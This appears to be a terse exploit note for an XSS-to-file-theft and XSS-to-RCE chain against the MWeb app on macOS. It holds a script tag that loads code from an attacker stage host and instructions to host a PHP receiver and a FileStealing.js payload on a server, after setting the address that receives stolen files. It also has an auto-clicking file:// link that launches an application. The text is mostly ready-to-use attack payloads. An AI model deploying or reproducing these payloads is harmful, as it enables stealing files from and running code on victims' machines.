XSS:
POC:
<script src="//XssStage/ip.js"></script>
Xss2FileStealing
php:https://github.com/TheKingOfDuck/MWebXss2Rce/blob/master/GetFile.php
(Deploy on the server)
jsEXP:https://github.com/TheKingOfDuck/MWebXss2Rce/blob/master/FileStealing.js
(Deploy on the server)
just like:
<script src="https://github.com/TheKingOfDuck/MWebXss2Rce/blob/master/FileStealing.js"></script>
Pay attention to modifying the acceptance address of the file(in FileStealing.js)
Xss2RCE
POC:
<script>
<a href="file:///Applications/Calculator.app" onclick="closewin();" id="alink">
<input id="btn" onclick="test()"> </input>
<script>
document.getElementById("alink").click();
</script>